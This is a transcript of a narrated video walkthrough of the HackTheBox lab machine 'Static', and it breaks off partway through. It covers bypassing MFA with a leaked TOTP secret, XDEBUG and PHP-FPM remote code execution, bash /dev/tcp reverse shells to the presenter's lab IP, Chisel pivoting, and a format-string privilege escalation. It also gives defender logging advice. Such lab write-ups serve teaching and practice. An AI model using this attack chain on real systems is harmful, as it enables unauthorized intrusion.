What's going on YouTube? This is IPSec and we're doing static from HackTheBox. And this box by itself wouldn't be that tough, I think, if you removed all the tunneling aspects. It's got two different exploits that you have to do that are pretty much just identify the vulnerability, down the exploit, and run it. And then at the very end, there is a binary exploit, but it's just a format string vulnerability that isn't really that tough to do once you think about it a little bit. In hindsight, none of the binary exploits are tough. But anyways, the challenge comes into the very first step is bypassing MFA by downloading the secret and just generating your own PIN. You log in and you get a VPN key. Now that VPN may be unstable if you have a weird issue with your MTU, the maximal transmission unit, that we'll get into later because you're stacking different VPNs on top of each other. But in order to exploit the third box, which has the format string vulnerability, you have to exploit a web server. And then that format string vulnerability can't reach back to you and you can't reach back to it. So you have to set up a pivot that can talk through the web server to both of them. And we use Chisel for that. But let's just get into it because it'll make much more sense, hopefully, once you see it. As always, we begin with an Nmap. So -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the Nmap directory and call it static. And then the IP address, which is 10.10.10.246. This can take some time to run, so I've already ran it. Looking at the results, we can see a few ports open and one port closed. The first one is SSH on port 22. Its banner tells us it's a Debian box. The next one down we have is a closed port on 2222. And when I normally see this port, I think it's going to be SSH, just listening on a non-standard port. And the reason why it's closed is because this port behaved differently than all the other ports on this box. So chances are there's an IP tables rule or just a firewall rule in general, dropping the packets to this port. The next thing we have is HTTP on port 8080, and it's running Apache, and the banner also tells us it's a Debian box. The Nmap script does run and tell us there is a robots.txt file, and that has two directories /VPN and FTP uploads. So let's go take a look at port 8080. I'm going to go to 10.10.10.246, port 8080, and we just get a blank page here. But again, Nmap went to the robots.txt, and if we do that, if we type robots correctly, we can see there's two directories. So I'm going to go to /VPN, and oh wow. So this server is configured in a way where directories need that trailing slash. Normally that isn't a thing with web servers. I can probably share that again with this .ftp uploads directory. So if I go here, we can see that one behaved. So there's probably some weird forwarding rule or something going on here. Because when I do /VPN, we get not found. If I add this last slash, it does. So I'm thinking they're in like Apache, there's a virtual host location that has VPN slash in it, and then doing a proxy pass or something to a different thing, just because it's really weird to need that trailing slash. And we can see it's not like globally in this whole web server, because if I do .ftp_uploads, it adds that slash for me. So that's weird. I don't really know what else to say other than there's some good enumeration you can do through that. So I'm just going to download this gunzipped file and also take a look at warning.txt. That just says binary files are being corrupted during transfer. Check if recoverable. So let's go and copy the files we downloaded. So I'm going to make dir downloaded. We'll go in there and move downloads. What was it? FTP? No. DB SQLGZ here, and we can try gunzip-d to extract it, and we have a error message. Now, if we use a tool called zcat, which is going to be cat, but it will uncompress as it goes, it will uncompress everything up to that error. And just looking at this, it does look like some things are slightly off, like the CO3 NT, like this string doesn't look correct, but toIncrement does. We have a username admin. And then over here looks a bit weird. This looks like, is that a MD5 sum? If I do echo-n, wc-c, 43 characters. So maybe this is a SHA-1 sum and there's some junk at the end. And then we have this, echo-n, wc-c, 18 characters. So I'm guessing this is supposed to be 16. If we look at this create table statement, we can see usernames have a max of 20. Generally with usernames, it could be 1 through 20 characters. So what I meant by that is usernames aren't fixed length. It could be any number of characters. This password being varchar, it's probably a hash, which is a fixed length string. And a hash of 40 characters is most likely a SHA-1 sum. And then we have this TOTP, which is normally a one-time pad. So this is like a Google Authenticator or something doing multi-factor authentication. And that's limited at 16 characters. So I'm guessing the one-time pad is going to be this field and the hash is going to be this field. And either the one-time pad is going to be the first 16 or the last 16 of this, and vice versa for this hash. However, we can probably fix this gunzipped archive. I'm just going to Google fixgz GitHub and see if there's a good application to do this. Looks like there is. It's a C++ program, and they gave us a exe, but not a ELF file for Linux. So let's just download this and compile it. So I'm going to go opt git clone, and we'll go into fixgz. fixgz. I'm going to do G++ to compile this. .c++ o fixgz for output, and it looks like it compiled successfully. So I'm going to go back to the previous directory, which unfortunately was /opt, so htb static downloaded. And I'm going to run opt fixgz against this, and the output, how we do it, it's bad as the first argument, fixed as the second. So I'm going to call it fixed db.sql.gz. And I'm going to gunzip-d on this file and no more error messages. So if I cat this, we can see this looks much cleaner than what the zcat did. And looking at this, we can see this was the last 16. And then this hash, let's see. Ooh, this added characters, so we never would have got that hash. So that's interesting. But let's just grab the good hash, and we can try to figure out exactly what this is. We could send it to hashcat, but I'm just going to try a few things first. And the first thing I try is the username admin. If I do SHA-1 sum, we can see that is a match. And I'm going to guess this database entry goes to that /VPN portal. So let's try admin in the VPN portal. And we do log in, and we get a two-factor enabled. And we also have the two-factor code that is going to be this. But in order for this to work, our time has to be synced with the server. I'm going to go back to that Nmap script real quick, nmap static.nmap, and it didn't tell me if my time was incorrect. So maybe the time is actually synced. I'm going to do vi, we'll call this otp.py, and then I'm just going to import pyotp. I think I have this library installed, Python 3, import pyotp. It looks like yes, it is. And how we use this is just TOTP is equal to pyotp.totp, and then the secret key. And I need to go copy that. So cat downloaded, fixed, and let's grab this. I guess I didn't have to create a script to do this. I could just do this in the Python command line, but yeah. So let's do print this, Python 3, OTP, typo, py, object, let's see, google.com, pyotp example. see, how do they use this? TOTP verify. TOTP.now it looks like. So we can do .now. And we get this code. So I'm probably going to have to try this twice because this login may have failed. So let's try admin. Then we run this again. The TOTP is still the same. And we go back to the username. So our time is not synced. We could probably run a sync with the ntpq command, I think. Before we do that, let's check if NTP is open. So sudo nmap-su NTP, I want to say it's port like 123 maybe. NTP port. Let's see. Yep, port 123. 10.10.10.246. And see if it is running. It does say it is open. Open or filtered. Let's see. NTPQ. And 10.10.10.246. No, that's not the command. Shoot. NTPDate is what I think I want. 10.10.10.246. I'm going to run the date command before and after. And we probably have to do sudo. So it's now syncing the time with the server. No suitable synchronization found. Let's see. That did not work. I'm going to try putting it into my actual script. So let's go into otp.py and we can import ntp lib. Then from time, import ctime. C is equal to ntp lib, ntp client. And then time is equal to c.request 10.10.10.246. And print time. Is that going to work? Python 3 OTP. Let's see. Is it time dot tx time, I think? So we do get time back. If I was going to say Google this to a time. Let's see. Epoch to date. I'm probably going to hate myself for doing this because of time zones. But we can still try it real quick. 1729 GMT. And this is saying the same time, I think. Thursday, December 16th, 5:29. Yeah, that's weird. Let's see. If I do this TOTP now, and then let's print TOTP at, and we can say time.tx time. See if we get different things for this. Line 10, two parentheses. We do. So let's try that second one of querying it with the server time. Admin 121369. And there we go. We get in. I'm not exactly sure where my mistake was, but I do want to talk about this in general, something a bit different. If you're a defender and doing some type of logging, I would highly recommend having a dashboard that looks at the HTTP response codes of these pages. Because if you have a single IP address and the access log get multiple 200 OKs, which sounds weird because you think 200 is success, but in the case of most logins, a 200 is actually a failure because it just says 200 OK, bad password. On a successful login, generally it redirects people away from the login panel. So you'd want to look for a single IP address hitting VPN login.php and getting multiple 200 OKs because that's indicative of a password spray. And then upon a 302 redirect, if you see that, then the password spray was successful. And that's something you should actually alert on, because one IP address getting like 5 failed login attempts and then is successful, that's now interesting. And then the additional thing you could look at is people that get the 200 OK on this two-factor page. If you see people successfully, hold on, my intercept is acting weird. If you see people successfully getting 200 on this page and then it never does a redirection away, that's also suspicious. It's most likely they entered their credentials in some type of phishing thing and the attacker logged in but couldn't pass this two-factor thing, but their password is still compromised, so you should know that. So definitely think about those things when setting up multi-factor authentication. And is there a way for me to monitor when someone does a successful authentication but fails the multi-factor part, because that is extremely important. So let's log in here and see what we have. It looks like we have this static inc internal IT support portal, and it has a few IP addresses and host names. It says this is offline, but everything else is online. It wants a common name here, so I'm just going to do ipsec and click generate and see what it gives me. And it's giving me a OpenVPN file, which is cool. I'm going to copy the OpenVPN file to my current directory, and then we can run it with OpenVPN. Now, there's one thing I do want to mention while I'm here, and that's I'm going to tunnel 2 VPN connections. I'm almost positive I'm going to run into an issue down the line because I'm doing this. And the issue I'm running into is going to be a MTU issue. That is Maxable Transmissible Unit, I believe. And I think 1492 is the default. That's 1492 bytes. And what OpenVPN actually does is it appends bytes to your packets. And when you have just one OpenVPN connection, that's not going to be an issue. It's smart enough to know I'm going to hit 1492. When you have multiple VPN connections going on, that's when you can actually confuse the network interface, because you create a packet, then OpenVPN changes that packet, makes it back to 1492, and then the second OpenVPN connection comes, and then it actually makes the packet go above 1492 because it adds its like 20 or 40 byte header. I forget what OpenVPN's header size is, but it adds that into the packet, and you go above that, and then just weird behavior happens. Whenever you try to do something that is a big packet, it fails. But if you do small packets, it's successful. And it's a really big pain to troubleshoot. And the fix of that is using a line called MSSFix and doing like 1400 to set the MTU size for this tunnel. But I'm not going to do it yet. I just want to run into the issue before I make any changes. However, I'm somewhat confident we will hit that later on in this video. So let's connect to the VPN. I'm going to do sudo openvpn ipsec.ovpn, and it's not connecting. Let's see. Oh, it's trying to hit vpn.static.htb. So let's make sure that resolves to the IP address. So sudo vi etc host, and we can say 10.10.10.246 is that IP address. So now when I run this, we have a successful authentication. I'm going to call this one 2ovpn. Actually, that is confusing. One double ton, I guess. I don't know what to call that pain. I'm going to do the IP ADDR, and we can see the second VPN is on ton 9 now, and my IP address is 172.30.09. But I don't know exactly what's behind this VPN. I'm going to assume its IPs here, the 172.17 and 20 and 30 network, along with this. So let's make quick IP addresses for that. So let's go here. I'm just hitting the Windows key, the left and right arrow to do those auto resizes. And I'm going to make dir VPN. We'll go in here and vip.lst 172.17.0.0/24 172.20.0.0.24 172.30.0.0, 24, 192, 168, 254, 0/24. I can also do a IP route command to see what my gateway is. I'm going to grep it for ton9. This is going to be everything that's going out this interface. And let's, I hit the Windows key up to make that full screen. We can see there's only 2 actual routes, and our list, we have 4 different subnets, and that could be just because of like CIDR notation. But looking at this 172.30.0.0.16, that means any of these octates can change. So the IP has to begin with 30, and this 24 means this octet is the one going to be changing. And we can see there is a route here to the 20 network, and this 192 address that would not be included in this. There is a Academy course on beginner to networking if you want to learn more about subnetting. But quickly speaking, if the subnet is 0 through 7, you know this is going to be changing 8 through 15, then 16 through 23, and then 24 through 32 would be this octet as you focus on. But definitely check out the beginner networking course if you want a more thorough explanation, because I helped write that course. But anyways, let's go back to this. The link source is 172.30.0.9, so anything that goes through ton9 is going to go through this gateway. So I'm going to do an OR statement in grep by \pipe, and we can also say 172.30.0.9 just in case any of these routing statements did not include device ton9. We can see it doesn't. So what I'm going to do is just add a route to send these 2 subnets through this interface. So I'm going to do sudo IP route add, then 172.20.0.0/24 via 172.30.0, probably 1 is what I should do. Let's see. Ping 172.30.0.1. Yes, that would be the gateway. Normally in networking, this admin generally uses the first or last IP for the router. Most likely it's going to be the first, which would be 30.0.1. I could probably also do IP route via and use device, but I always like using the 172.30.0.1. And we can see that here, I think. Wait, I'm confusing myself real quick. IP ADDR. I am 30.0.9. 17.0.24. So, yeah, this is the gateway address. Okay. Confused myself for a second, but we'll get there. So sudo IP route add 172.20.0.0/24 via this 172.30.0.1 address, which is the gateway. So now let's just do a basic Nmap. So I'm going to do nmap-sn. This is going to be a ping-only scan. And I think IL for input list. I'm going to do VPN IP.lst. I think I have to save that. LST. And I'm going to OA VPN for scan, I guess. And -v so it shows me open host as it finds it. And now we're doing a ping scan on those 24 networks, the /24s. I could have done one on that /16, but generally I avoid that because of just how many hosts there are when you do that. And yeah, so let's just wait for Nmap to finish and then we can progress. Nmap is done. It did take about, I want to say that's like 3.5 minutes or 4 minutes. The one thing I probably could have done to speed that up, I noticed at the very start of it, it said like parallel DNS resolution or something. If you add this -n flag, I'm almost positive it would speed it up. But let's take a look at all the hosts that are up. We just see a bunch that say down. Hopefully the Nmap output doesn't say that. So I can do, wait, what? cd nmap ls. Where did I put that scan? ls downloaded? Nmap VPN first scan. Okay. I put it in the VPN, not the Nmap directory. I confuse myself sometimes, but I can probably grep up on first scan, and it doesn't have the host. I can add a -B1 for before, and we can see all the IPs that are up. But that's not the best way to go about it, probably. The Nmap file would probably be the best because this is the greppable format. That's what the G stands for. So I could also just grep -V either for up or, well, if I did up, I wouldn't do -V. But -V is going to exclude, so I can exclude everything that says down. And this is a much more pretty output because we're grepping the format that is meant for grep. So yeah, we can see 172.17.0.1, 21, 31, and those are routers. And we also see 10, 11, and 9. So I'm going to focus on these because generally I don't like attacking the .1s. The one thing I will generally check for is the Cisco Smart install, the SIET, S-I-E-T, and I want to say that port, maybe 6789 or something. Cisco Smart Install Port, SIET. Let's see what port that is. Come on. SFTP, SIET, 4789. 4789 or 86. 4786 is the port I would definitely check on routers to be vulnerable. It could have like SNMP and you can do things like that, but this box isn't about attacking routers. So let's go and check out these 3 IPs. Let's do v host.lst. Go here, host.lst, 172.20.0.10, 11, and 9. So 11, 30.0.9, and we can do an Nmap scan here. So nmap-sc sv oa, and I'm just going to call this, we'll put it in the actual Nmap folder and call it host VPN, and il for input list, host.lst. The other thing we could do is check TTLs on each of these IPs. So ping-n1, 172.30.0.1. And wait, did that not ping? Okay. Is it -C for Linux? Yeah, I always get that mixed up. But that TTL is 64. It was 20 and 17, I think, for the other two. So 20, TTL 64. 17, TTL of 64. I'm going to assume this is pretty much going to be the same box. If I saw a TTL of like 255 or 254, I would be thinking this is a Linux or a Cisco box or some type of router. Anything honestly above 128, I would be taking a look at more in depth. But let's see if that Nmap is finished. It has. So let's do less Nmap host .nmap and see what we have. So on this box, let's see, 170.20.0.10, we have info.php and VPN. On 20.0.11, we have mysql. 30.0.9, we have port 3000 and nothing else. If we go back to this last page, let's see, this VPN panel, 30.0.9. Is that any of these? Nope. 20. Do we have 2010 and 2011? 2010 and 2011. So 2010 is web, 2011 is DB, and 30.0.9, we have no idea what that box is because it's not on this list. So I'm going to check the unknown box real quick on port 3000. So this, port 3000, and we just get a Apache test page. So we probably should be running like GoBuster or something on this box. Curl-v 172.30.0.9, port 3000. I'm just looking for the actual headers. And let's see, that's just saying it is Apache. So what was the other one? 20.0.10, I believe. And we can see this one is telling us it's a Ubuntu server, which is different than Debian. So we know this box is completely different than the first box we attacked, because that one was Debian. This is Ubuntu. So let's try 172.20.0.10. And we have info.php and VPN. I'm going to try admin on this VPN. And it says 2FA. So let's let's go here. Python 3 otp.py. We can do this. And this is looking like it is the same exact application. So I'm thinking I may have missed something in my enumeration steps at the start of this box. And I kind of hinted at it, I believe. But I want to test this real quick. If I look at this, yeah, Ubuntu. So remember when I said there was something weird because when I did this git/VPN, it was not found, but I added the slash and it directed me somewhere. I missed a piece of recon, actually. I kind of guessed at it, but I could have looked at the server header because we see Apache 2438 Debian. And when I add this slash, it's 2429 Ubuntu. So we now know there is definitely some type of proxy going on with that /VPN/. Definitely should have looked at Burp Suite when I was doing this for the first time, but yeah. I'm interested in that /VPN or that info.php page because this wasn't accessible to us previously. And this is just PHP info output. If we had a LFI vulnerability somewhere, we could probably weaponize that to get code execution. But scrolling through this, let's see if we see anything else interesting. This is MySQL information, open SSL session, XDEBUG. And if you remember a long time ago, if I do ipsec.rocks and I search for XDEBUG, there is a video exploiting this. So let's just try the exploit on XDEBUG to see if we can get it on this PHP info page. To do that, I'm going to go back into my terminal and we're going to switch to curl to test for this. And then once we verify it's vulnerable, we can play with it. XDEBUG, if you send it the magic packet or the magic request, it's going to respond back on port 9000. And I learned that from doing Olympus Machine, which was the first time I actually ever exploited this. But we can do a curl 172.20.0.10, and then the magic request is xdebug session start, and then you can put anything here, so you should just please subscribe to my channel. And it doesn't respond back, but if I try info.php, it does connect back to me, and we can see all this magical XDEBUG stuff. The one thing I'm really curious about is if it gives the XDEBUG header letting me know that XDEBUG is running. So I'm going to do this curl -v, and I'm going to search my output for curl. And in this header, I don't see XDEBUG. And I'm going to do info.php. Same thing, search back for curl. And that is done quite a bit because it's the PHP info page. And I still don't see XDEBUG running. So this is just, I guess, something good to test for, because how I thought about it before when doing Olympus is you see header, you test. But in this case, header doesn't exist, but it's still vulnerable. That's probably because of a reverse proxy or something. Well, no, I'm accessing this box directly. I have no idea why the header's not there. I don't know much about the exploit other than how to weaponize it. If you go through like GitHub and look for exploit scripts, it's all like Russia, Chinese, or Python 2, which all three of those I hate working with. So I just use XDEBUG the native way, which is opening up Chrome. I'm going to Google XDEBUG Chrome app, and we can just add to Chrome, add the application, and now I can do this request because I think I'm listening on port 9000 now. We can grep for 9000. I am not, because I did not click listen up here. Now we are listening. And if I made that curl request again, curl, let's see, xdebug session start, there we go. We see I am now connected. The other thing you could have done is just going all through Chrome. Like leave that open and let's do Chrome XDEBUG plugin. I think there's a helper plugin that if we install this, add extension. Let's see, let's make sure that extension is pinned. 172.20.0.10 info.php. Let's make sure we are listening. And that automatically sent that request to me. So another way to do it. To play with this, we can click on this, and now we should be able to run any PHP command. So PHP system ID. Oopsie daisy, error value and encode. Let's see. Maybe I have to set a breakpoint. So I'm going to click on this. When it's red, I set a breakpoint. Let's stop, listen, refresh. Run. Something weird is going on. 20.0.10, okay. Info.php. Stop, listen, refresh. I'm not sure what I screwed up. It's working. Oh wait, I may be step into. Let's see. The error value encode thing is probably, I don't use PHP tags, right? No. Let's close this app and relaunch it. I'm not sure what I screwed up, but starting your things over is always good. You can launch Chrome apps by doing Chrome://apps. Click on XDEBUG again. Listen. Refresh this page. Awesome. Okay, I'm going to click Run. And I think it finished the script. Let's go again. Working. So let's see. Can I just run PHP commands here? Like system ID. Error evaluate encode. PHP. Huh. Break on expression. Stop, listen. So I'm going to relaunch the app, pause the video, watch my Olympus video, and find out what I'm doing wrong. Because, famous words, but this should work. So let me pause the video and check it out. So I think the answer was I was putting a semicolon, and I should not be putting a semicolon, which is weird. Normally in like programming, I'm used to always needing that semicolon, but apparently you don't. I'm going to run info.php, and I'm going to click down here, and we can try system ID and semicolon. We get that oopsie daisy value encode. Don't put the semicolon, and it happily tells us it's www data. So now we know we have code execution. I can do --c, --i, dev tcp 10.10.14. Oh no, I probably shouldn't. Well, we can try this. 10.10.14.8, 9001, 0 and 1. We can try it. I don't think it's going to work. The reason why being the IP address. So nc lvnp 9001. We try to run this, working, and I don't get a callback. But remember, I'm on 2 VPN connections, and the box I'm talking to may not know what 10.10.14 is, but it probably knows what 172.30.09 is. So let's try this. Wonder if I can just do it here, 172.30.09, working, and we get a shell. Awesome. Python 3, import pty, pty.spawn, bin bash. Oh shoot. FG enter. Which Python? Is Python not here? Python 3. Awesome. Python 3-c. import pty spawn bin bash. stty raw minus echo fg enter enter. And now I have a shell on this box. I'm going to do export term is equal to x term so I can clear the screen. And we can close out of Chrome because we don't need it anymore, as long as we don't lose the shell. So this is where I'm going to think we're going to have issues with the double tunnel. So on this box, let's see, what do we want to do? We'll probably want to check out the VPN. And then if we look at database.php, we can see there is credentials. So if I try typing like mysql, it says command not found. We could write like PHP scripts to dump the database if we wanted to, because I'm assuming the mysql PHP module is installed because it's running this web app. But the easiest way to do would just be tunneling it. And to tunnel it, I always like using Chisel. So if I Google Chisel GitHub, it wouldn't be a video if I don't remember I disabled Google in my search bar, but go here. Let's download the latest release. Let's see, AMD 64. Let's just download by clicking it in case it does a weird redirect. And then we can move Chisel, or downloads Chisel here, and then gunzip-d on the Chisel application, and move, well, make dir dub and move Chisel into that directory. And I'm just going to call it Chisel to make it easy. So chmod plus x Chisel, so I can run it when I want to, and python 3-m http.server. And let's go into our home and try wget on, what was it, 172.30.09, I think I was, 8000/Chisel. And we can see my connection is hanging. We could play with a lot of things and always run into some weird issues. And this is that MTU issue I was talking about earlier in the video. If I just like make a web request, let's do vindex.html, hello world, and we run this web server. We try to download index.html. We see it downloads just fine. But if index.html gets to be too big, it's not going to work. So python 3-c print a times, let's try 1750. This should probably put it over that limit, to index.html, and run this web server. We can see it now hanging because, again, it hit that limit. Out of curiosity, I'm going to try 1500. And let's just go in here, python 3-m http server. At 1500, it's failing. Let's see. Let's change it to 1450. I'm guessing this is still going to fail. Still fails. If I change it to 1400, fail. Let's see. Let's just go to 1200 and see what happens. This should succeed. Yeah, it saved. So you can see there's a weird thing with how big files are. So what I'm going to do is very quickly change out the MTU on this. I think if I do IP-ADDR, we can see what the MTU is. I know there is, yeah, MTU 1500. That's maximum transmission units. So I'm just going to quickly do MSS fix 1400, save it, and then close out, relaunch the VPN. And if I do IP-ADDR, still says the ton is 1500, but I think OpenVPN is going to be smart enough to resize things. So now I do wget. Do I still have it? My shell is still active. And if I do one of these previous ones of 1750, it downloads it because that has been fixed. So let's try downloading Chisel now. And I'm sure there's a bunch of other ways people have worked around this weird issue, but this actually fixed it at the source. So I can't wait to read everyone's write-ups to see how they worked around this issue. But move Chisel1 to Chisel. We can delete all these indexes and chmod plus x, Chisel. And the one thing I want to do is MD5 sum both ends because we were working with some transfer issues before. So I just want to make sure it all came through fine. And MD5 says it is the same exact binary. So let's run Chisel and we can tunnel to the MySQL. So Chisel server -- reverse to allow reverse tunnels. And file Chisel. Oh, I downloaded the Mac version. Or Darwin, I should say. I guess that's the Darwin Award. Let's see. That's Linux, AMD 64. No, that's ARM, AMD 64. Let's just see if I can copy link, wget. That looks good. RM Chisel, gunzip -d, this, mv this to Chisel. And let's set up that web server again. HTTP server. Remove Chisel from here. And where's that wget command? cd www. There we go. So now I should be able to chmod plus x, Chisel, Chisel server reverse. 8080 is in use. -p. Let's do 8001. And we can do /chisel, chmod plus x, Chisel, Chisel client 172.30.09, port 8001. I think that's how we connect to it. Nope, probably colon. And we need to specify what we want to forward. I think reverse 3306. Localhost 3306. And I should make sure MySQL is not listening. Doesn't look like it is. So when I run this command, connect, I can look at this. I am now listening on localhost, and anything I send to this port gets sent through Chisel and then to the wrong host. Shoot. I need to fix that TTY. STTY-A. We want rows 13, columns 105. STTY, rows 13, cols 135. So now when I hit up, we go in. And I forgot, we actually want a different host, not localhost. We want DB. So again, what this is doing, opening port 3306 on my box, and then anything I send there, it's going to this socket, which is DB3306. Okay, so now I should be able to do mysql-u. That was root. Where is DB? DB name. There we go. Root-p. We can just copy this password. Paste. -h. I think capital H for IP address. Maybe not. Through socket, maybe lowercase. There we go. Lowercase h. I can do show databases. Show databases. And we can see all the databases. So we could probably select load file etc passwd. And we could view things on this box. But the main thing I'm curious about is what's in the database. Select or use static, show tables, select star from users, and we just have the admin user. So there's nothing really interesting in this database. We could spend a lot of time trying to shell this box, which may be possible, but we could also go back to the reverse shell where we have this chisel running and see if this box can talk to anything that our VPN could not. And my main goal is getting to this PKI box, because PKI stands for Public Key Infrastructure, and generally if you can get onto their PKI server, you can sign certificates as them and pretty much own the domain. So based upon these names, PKI is probably really interesting. And if I do a IP-ADDR command, oh, it doesn't even have IP that. If config, I can see I do have an IP on the same broadcast domain as PKI, so chances are I can talk to it. We could also run like IP route and, is it netstat-rn? Yeah, we can see we also have a route that way. But if I ping PKI, we see it does respond to me, and we could try nmapping this box through getting a static library, but I'm just going to try curling it to see if port 80 is open, then we can start attacking it. wget? Yes, we have port 80 open, so I should map that port back to me. So what I'm going to do is that chisel command again. And if you wanted to do static binaries to do nmap through this, if I Google or ipsec-rock static nmap, I would watch this video, but it would probably take another 5-10 minutes of me doing that when the content's already there. So this is connecting back to me on port 8001. We want to do a reverse. I'm going to listen on port 8000. We're going to send it to PKI on port 80. So now, if I curl localhost 8000, we get something weird. Localhost 8000. It is a rhrough page. If I control U, there's nothing in the source. If I do a -v, we see it is Nginx on Ubuntu. This is new. We saw the last Ubuntu machine was running Apache, I believe. But we have this X powered by header, this PHP-FPM 7.1. We could probably exploit DB, PHP-FPM, and find it, search exploit it. And let's see, there is a Metasploit script and this. So if I less this MD file or search exploit -x or -m for mirror, or -x for examine, but I have to specify this. We can see the exploit DB page here. But what I'm going to do is just Google GitHub, and we'll search for the PHP version, this PHP-FPM, and add exploit to it. We see we go to a GitHub page, and it's a weird name. Tells us how to use it. Essentially, we just execute the file with the URL. So what I'm going to do is go into opt, get clone, because we have to build this. It didn't have a release, cd PHuiP. So go build. And then we can, let's just go back to HTTP. Where was I? Well, we can execute out of here. PHP here, HTTP 127.0.0.1, port 8000. Slash index.php. There we go. So it wants a page. And looks like it is running. Status code 502. Target's probably vulnerable. So still just waiting on this. And I think it also says it may not work the first time. If it doesn't work, please try again or something. So it's not an exactly reliable exploit, but it says success, was able to execute command by appending this. So now, if I append this with ID, oh no, we want to just curl it. Curl, and run it a few times. There we go. We have this executing. I'm not exactly sure what is going on here. I want to say we probably just poisoned like one PHP thread, and FPM probably stands for like functional pool manager or something. PHP-FPM. Let's see what that stands for. Generally, when I see PM, I think pool manager. Fast CGI process manager is what it stands for. So maybe there's threads and we poison one thread, and that's why it doesn't work all the time, but sometimes it does work. Not exactly sure, but we do have a way to get code execution. So let's try to get a reverse shell. So the first step to do it is let's go into repeater, because repeater is life. Let's do host, localhost, port 8000. And I'm just going to try getting index.php to make sure I set this request up right. And a is equal to --c --i dev TCP 10.10.14. Oh no, we want 172.30.09, port 9001, 0 and 1. And then we can do that. And that's why I like putting it into repeater, so I can see exactly how the URL encoding is working. And send this a few times. And it hung. I'm assuming that time it tried to do a shell, but we're not getting a hit. That's weird. I'm going to try ping 127.0.0.1, and be sure, always do a count when you do pings, because on Linux, it'll just go indefinitely. So I want to make sure this ping works, and I can see output. And now let's try 172.30.0.9. Oh, I went too fast. There we go. And we get destination port unreachable. So this host can't talk back to us, but that's okay, because we can use Chisel and handle this. So IPADDR, ifconfig. I'm so used to the IP commands now. So this time we don't want to do a reverse tunnel. I'm going to specify 192.168.254.2 on port 9001. Actually, we'll do 9002, so it's obvious what's happening here. And then we're going to send that to 172.30.0.9 on port 9001. If I did this correctly, then this box should be listening on port 9002 on this interface, and anything it gets, it will forward it back through Chisel to me on port 9001. So let's do, what was I listening on NC? Right here. So let's go here. We can Control Z a few times to get back to our reverse shell, and change this to be port 9002 and 192.168.254.2, I believe it was. And we're waiting for it to hang or give an error. So now it hung. I go back to my prompt and I have a shell because it's going through that box it can talk to. And I'm on the PKI server now. So Python 3-c import pty, pty.spawn, then bash, Control Z, stty raw -echo fg, and hit enter. And now I'm on this box. Let's see, ls uploads. There's nothing here. Cat index. We can see it is running this weird tool, user bin ersatool. I'm going to, actually, let's just md5 sum it real quick. We have to specify user bin. And I always like taking md5 sums and submitting it to VirusTotal, so we can see if this is a unique binary or something that exists out there. And generally when you see no matches found and you submit an MD5 sum, it's going to be unique. So this is a custom coded binary, which means we probably should look at attacking it. I'm going to do a find slash and to dev null. I'm going to grep it for ERSA just to see if there's anything else on this box that resembles that. And we can see in user source, there is source code to this. So we don't have to do any fancy reverse engineering. We can just do source code analysis to see if we can find any buffer overflows or anything of that nature. So let's copy this whole thing. And then we can let's do make dir exploit ersatool.c, paste the source code. I think I screwed that up. rm vi set mode to paste, and then paste it. There we go. That looks better. And we probably should also grab the actual file. So user bin base64 ersatool, and grab it this way because I think it's small enough. Yep. And I could probably just copy it with an netcat or something like that, but I didn't feel like dealing with the tunnels. Clipboard is a good way to exfil data. ersatool.b64, paste it, base64-d to ersatool. Okay, so now we can just analyze this source code. And this whole part of the video is powered by Hindsight. This took much longer than hopefully it takes me here. It probably took like 2 to 3 hours to figure out this whole binary exploitation chain, and I had help from OXDF as I was doing it. So if I go over this quickly and you don't really understand how it's going so fast, don't worry. But the first thing I notice is a lot of global variables up here. I say they're global because they're not within a function or anything, so they're just up here. And keep in mind the names ERSA_dir, TA key, EXT, etc. But we look through this, and if I equals 1, it's going to do this printf and printf and like saying what is the common name, and then it's going to read a string from the user and assign it to the variable buffer. If we keep going down, we can see eventually it does a printf on this buffer string. So this is a typical format string vulnerability of passing user input straight to printf. If we keep going down, eventually we'll see it doing this systemcmd command after setuid 0, and it also changes the directory into ERSA directory. So this CMD looks like it is being populated. Let's see, what is CMD? It's being read in from this sprintf, and it's built upon this, and it looks like this variable is easy_rsa. If we look at that, that is being built up here. It's this ERSA directory and then /easy_rsa. With the format string vulnerability, we have the ability to write data into memory, and we can change variable names. So if we change this ERSA_dir from opt easy_rsa to like dev shm, then we're going to control the directory it's executing a binary from as root, and we can just create the file easy_rsa, make it a bash script, and have it execute bash and get code execution that way. So that is essentially going to be what we do. And let's verify the printf thing is as we expect. So I'm going to execute this. We do a help. We can create, print, revoke, or exit. If I go to print, this is where we have that cn, and we can do a few p's for pointer and print some things out. The one thing about format string vulnerabilities when you build it manually is if you do % and then a number, so 1, and I do $p, I'm going to print the very first thing. Now if I do 2, %2 $p, you guessed it, I'm going to print the second thing. So we can control whatever we put out here by doing this number. The other thing that is a bit tricky is how you do padding in this. So if I do that 2p, we have it just 0x5. If I do 16p, that's going to write or do padding for 16 characters. If I grab this and we do echo-n, wc-c, that's 16. If I wanted to 0 pad it, I could just add a 0 here and do 16. And now it looks like a memory address. If I do echo-n, do this, wc-c, it is indeed a memory address. So that is the first piece of understanding this whole exploit, is we can just leak things. And I said memory address, that's just a number. The very first one was a memory address. So if I just do %016p, boom, we leaked this address. Now, the next piece to understand is there is ASLR here. So if I do print, let's see, %016p, and we do this a few times, we can see the memory address does change every time, but this piece stays the same. So we should look at exactly what this is. So what I'm going to do is gdb ersatool. We can run it and then do print, and we want %016p and see what this address is. If this address wasn't beneficial, I do a bunch of p's and just look at each address. But if I do x/s on this, hold on, let's Control C so we get into the GDB prompt. Then x/s, we can see that's .ovpn. It's kind and tells us it's the ext variable. And if we looked at the source code, vim ersatool.c, that is indeed the variable. This ersa directory is kind of around it, so we just want to find exactly where this is. Because ASLR is in effect, we know we can leak this, and if we find the distance between this string, the ext variable, and the ersa_ directory, then we can calculate all the offsets, and ASLR doesn't matter. Now, we could cheat and just do, don't kill pain, x/s, and we could do like and exts to print that, and we could do x/s ersa dir, and we could get it this way. But that's cheating because you normally won't have all these pretty variable names because it'd be completely stripped. So what I would do is x/20xg, take this, and let's remove a few, put zeros, and kind of just walk it. We actually don't need xg. We can probably just do 20g probably. Oh well. We can just walk it and see what it is. Or a 20s. Would this be better? Yeah, this is probably better. Because you wouldn't have these variable names. You just look at the string and see, oh, opt easy RSA. That is at this 0f0. If we hit enter to go down again, this ext is here. So what I want to do is go into Python. I'm going to take that variable. We're going to subtract it against this to find out the distance between the two. And it's 111. We could hex it. It's 6f as well. So now when we do our leak, we can easily leak this address, and then we know where the next address we want is. And the ASLR is in effect, but it only changes whenever the program restarts. That's why when I did it before to demo it, I got out of it and did everything through the argv. But 